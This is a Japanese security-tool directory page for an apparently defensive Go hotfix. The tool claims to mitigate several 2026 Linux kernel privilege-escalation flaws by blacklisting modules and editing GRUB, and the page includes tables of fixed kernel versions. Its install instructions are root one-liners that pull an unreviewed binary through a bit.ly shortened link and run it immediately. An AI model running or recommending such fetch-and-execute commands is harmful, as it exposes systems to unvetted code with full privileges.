Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
cve_2026_frag_family_fix — CVE-2026-46300 / CVE-2026-43500 / CVE-2026-31431 / CVE-2026-43284 golang ホットフィックス | Kitploit
ツール/GitHubGitHub/first-john/cve_2026_frag_family_fix
クラウドインフラストラクチャセキュリティ脆弱性スキャナー脆弱性分析スクリプトと自動化構成監査クラウドセキュリティDevSecOps
GitHubfirst-john/cve_2026_frag_family_fix

cve_2026_frag_family_fix

CVE-2026-46300 / CVE-2026-43500 / CVE-2026-31431 / CVE-2026-43284 golang ホットフィックス

リポジトリを見る
11ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
ウェブサイト

frag family 脆弱性を除去するためのソフトウェア / frag family 脆弱性の緩和ツール

  • Copy Fail (2026)
  • Dirty Frag (2026)
  • Fragnesia (2026)
  • DirtyClone (2026)
  • PEdit-CoW (2026)

任意の Linux で修正を実行 / 任意の Linux ホットフィックスの実行

root@kitploit:~
b="/tmp/cve_2026_frag_family_fix"; wget -qO $b $(wget -qO- https://bit.ly/4vetMTB | grep browser_download_url | grep -v .exe | cut -d '"' -f 4) && chmod +x $b && $b

または

root@kitploit:~
b="/tmp/cve_2026_frag_family_fix"; curl -fsSL "$(curl -fsSL https://bit.ly/4vetMTB | grep browser_download_url | grep -v .exe | cut -d '"' -f 4)" -o $b && chmod +x $b && $b

CVE-2026-46300 / CVE-2026-43500 / CVE-2026-43284 / CVE-2026-46300 / CVE-2026-46331

説明

  • CVE-2026-46300 / CVE-2026-43500 / CVE-2026-43284 / CVE-2026-46300 / CVE-2026-46331 の脆弱性に関連する有効なモジュールをチェックします
  • 利用可能な場合はカーネルアップデートを提案します
  • 利用できない場合は esp4, esp6, rxrpc, act_pedit を無効化します
  • modprobe によるモジュール読み込みをブロックします
  • grub に module_blacklist を追加します
  • カーネルアップデート後にホットフィックスを自動的にクリーンアップします
  • RHEL 互換システム(AlmaLinux、Rocky、Oracle、Fedora)では、Boot Loader Specification(GRUB_ENABLE_BLSCFG=false)を無効化し、GRUB_DEFAULT=0 を設定し、カーネルインストールフック(/etc/kernel/install.d/99-grub-update.install)を作成します。このフックはカーネルアップデート後に grub 設定を再生成し、次回起動時に最新のカーネルが読み込まれるようにします。
  • マイナーリリースでは、カーネルアップデートが利用可能な最新のマイナーバージョンへの更新を提案し、実行します。

説明

  • CVE-2026-46300 / CVE-2026-43500 / CVE-2026-43284 / CVE-2026-46300 / CVE-2026-46331 の脆弱性に関連する有効なモジュールをチェックします
  • 利用可能な場合はカーネルアップデートを提案します
  • 利用できない場合は esp4, esp6, rxrpc, act_pedit を無効化します
  • modprobe によるモジュール読み込みをブロックします
  • grub に module_blacklist を追加します
  • カーネルアップデート後にホットフィックスを自動的にクリーンアップします
  • RHEL ベースのシステム(AlmaLinux、Rocky、Oracle、Fedora)では、Boot Loader Specification(GRUB_ENABLE_BLSCFG=false)を無効化し、GRUB_DEFAULT=0 を設定した後、カーネルインストールフック(/etc/kernel/install.d/99-grub-update.install)を作成します。このフックはカーネルアップデート後に grub 設定を再生成し、次回起動時に最新のカーネルが読み込まれるようにします。
  • マイナーリリースでは、カーネルアップデートが利用可能な最新のマイナーバージョンへの更新を提案し、実行します。

CVE-2026-31431 / Copy Fail の緩和 (algif_aead)

説明

このユーティリティは CVE-2026-31431 の脆弱性(前提条件)をチェックし、root 権限がある場合は緩和策を適用します。

  • 保護済みの OS(WSL を含む)とカーネルバージョンの組み合わせを特定します
  • 修正を含むカーネルアップデートが利用可能な場合はそれを提案します
  • 利用できない場合は algif_aead を無効化します
  • modprobe によるモジュール読み込みをブロックします
  • initcall_blacklist=algif_aead_init を追加します
  • systemd 経由で AF_ALG を制限します

説明

このツールは CVE-2026-31431(前提条件)をチェックし、緩和策を適用します(root 権限が必要です)。

  • 保護済みの OS(WSL を含む)とカーネルバージョンの組み合わせを特定します
  • 修正を含むカーネルアップデートが利用可能な場合はそれを提案します
  • 利用できない場合は algif_aead を無効化します
  • modprobe によるモジュール読み込みをブロックします
  • initcall_blacklist=algif_aead_init を追加します
  • systemd 経由で AF_ALG を制限します

Linux でのビルド / ビルド

root@kitploit:~
docker run --rm -v "$PWD":/app -w /app golang:alpine sh -c "apk add --no-cache upx && go build -ldflags='-s -w' -o cve_2026_frag_family_fix cve_2026_frag_family_fix.go && upx --best --ultra-brute cve_2026_frag_family_fix"

カーネルアップデート(ホットフィックスではない)が利用可能な OS / カーネルアップデート(ホットフィックスではない)が存在する OS

カーネルアップデートのコマンド / カーネルアップデートコマンド

  • Debian apt update && apt install linux-image-amd64 linux-headers-amd64 -y
  • Ubuntu apt update && apt install linux-image-generic linux-headers-generic -y
  • CentOS dnf clean metadata && dnf upgrade 'kernel*' -y
  • AlmaLinux dnf clean metadata && dnf upgrade 'kernel*' -y
  • RockyLinux dnf clean metadata && dnf upgrade 'kernel*' -y
  • Fedora dnf clean metadata && dnf upgrade 'kernel*' -y
  • OracleLinux dnf clean metadata && dnf upgrade 'kernel*' -y

修正に必要なカーネルの最小バージョン / カーネル修正済みの最小バージョン番号

ツールをダウンロード
OSCopy Fail
(CVE-2026-31431)
Dirty Frag
(CVE-2026-43500/43284)
Fragnesia
(CVE-2026-46300)
PEdit-CoW
(CVE-2026-46331)
Debian 10 (buster)❌❌❌❌
Debian 11 (bullseye)✅✅✅✅
Debian 12 (bookworm)✅✅✅✅
Debian 13 (trixie)✅✅✅✅
Ubuntu 18.04 (bionic)❌❌❌❌
Ubuntu 20.04 (focal)❌❌❌❌
Ubuntu 22.04 (jammy)✅❌❌❌
Ubuntu 24.04 (noble)✅✅✅❌
Ubuntu 25.04 (plucky)❌❌❌❌
Ubuntu 26.04 (resolute)✅✅✅✅
CentOS Stream 8❌❌❌❌
CentOS Stream 9✅✅✅✅
CentOS Stream 10✅✅✅✅
AlmaLinux 8✅✅✅✅
AlmaLinux 9✅✅✅✅
AlmaLinux 10✅✅✅✅
Rocky Linux 8✅✅✅✅
Rocky Linux 9✅✅✅✅
Rocky Linux 10✅✅✅✅
Fedora 40❌❌❌❌
Fedora 41❌❌❌❌
Fedora 42✅✅✅✅
Fedora 43✅✅✅✅
Fedora 44✅✅✅✅
Oracle Linux 8✅✅✅✅
Oracle Linux 9✅✅✅✅
Oracle Linux 10✅✅✅✅
OSCopy Fail
(CVE-2026-31431)
Dirty Frag
(CVE-2026-43284)
Fragnesia
(CVE-2026-46300)
PEdit-CoW
(CVE-2026-46331)
Debian 10 (buster)❌❌❌❌
Debian 11 (bullseye)5.10.0-41-amd645.10.0-42-amd645.10.0-43-amd645.10.0-45-amd64
Debian 12 (bookworm)6.1.0-45-amd646.1.0-47-amd646.1.0-48-amd646.1.0-50-amd64
Debian 13 (trixie)6.12.85+deb13-amd646.12.86+deb13-amd646.12.88+deb13-amd646.12.94+deb13-amd64
Ubuntu 18.04 (bionic)❌❌❌❌
Ubuntu 20.04 (focal)❌❌❌❌
Ubuntu 22.04 (jammy)5.15.0-177-generic❌❌❌
Ubuntu 24.04 (noble)6.8.0-111-generic6.8.0-124-generic6.8.0-124-generic❌
Ubuntu 25.04 (plucky)❌❌❌❌
Ubuntu 26.04 (resolute)7.0.0-15-generic7.0.0-22-generic7.0.0-22-generic7.0.0-27-generic
CentOS Stream 8❌❌❌❌
CentOS Stream 95.14.0-701.el9.x86_645.14.0-708.el9.x86_645.14.0-721.el9.x86_645.14.0-721.el9.x86_64
CentOS Stream 106.12.0-226.el10.x86_646.12.0-231.el10.x86_646.12.0-246.el10.x86_646.12.0-246.el10.x86_64
AlmaLinux 8.104.18.0-553.121.1.el8_10.x86_644.18.0-553.123.2.el8_10.x86_644.18.0-553.124.4.el8_10.x86_644.18.0-553.136.1.el8_10.x86_64
AlmaLinux 9.75.14.0-611.49.2.el9_7.x86_645.14.0-611.54.3.el9_7.x86_645.14.0-611.54.6.el9_7.x86_645.14.0-687.17.1.el9_8.x86_64
AlmaLinux 10.26.12.0-211.26.1.el10_2.x86_646.12.0-211.26.1.el10_2.x86_646.12.0-211.26.1.el10_2.x86_646.12.0-211.26.1.el10_2.x86_64
Rocky Linux 8.104.18.0-553.123.1.el8_10.x86_644.18.0-553.124.1.el8_10.x86_644.18.0-553.126.1.el8_10.x86_644.18.0-553.136.1.el8_10.x86_64
Rocky Linux 9.85.14.0-687.17.1.el9_8.x86_645.14.0-687.17.1.el9_8.x86_645.14.0-687.17.1.el9_8.x86_645.14.0-687.17.1.el9_8.x86_64
Rocky Linux 10.26.12.0-211.16.1.el10_2.0.1.x86_646.12.0-211.16.1.el10_2.0.1.x86_646.12.0-211.16.1.el10_2.0.1.x86_646.12.0-211.26.1.el10_2.x86_64
Fedora 40❌❌❌❌
Fedora 41❌❌❌❌
Fedora 426.19.14-100.fc42.x86_646.19.14-101.fc42.x86_646.19.14-108.fc42.x86_646.19.14-108.fc42.x86_64
Fedora 436.19.14-200.fc43.x86_647.0.4-100.fc43.x86_647.0.9-105.fc43.x86_647.0.12-101.fc43.x86_64
Fedora 446.19.14-300.fc44.x86_647.0.4-200.fc44.x86_647.0.9-205.fc44.x86_647.0.12-201.fc44.x86_64
Oracle Linux 8.105.15.0-319.201.4.4.el8uek.x86_645.15.0-319.201.4.6.el8uek.x86_645.15.0-320.202.8.5.el8uek.x86_645.15.0-322.203.3.2.el8uek.x86_64
Oracle Linux 9.76.12.0-201.74.2.2.el9uek.x86_646.12.0-201.74.2.3.el9uek.x86_646.12.0-202.76.4.4.el9uek.x86_646.12.0-204.92.4.2.el9uek.x86_64
Oracle Linux 10.16.12.0-201.74.2.2.el10uek.x86_646.12.0-201.74.2.3.el10uek.x86_646.12.0-202.76.4.4.el10uek.x86_646.12.0-204.92.4.2.el10uek.x86_64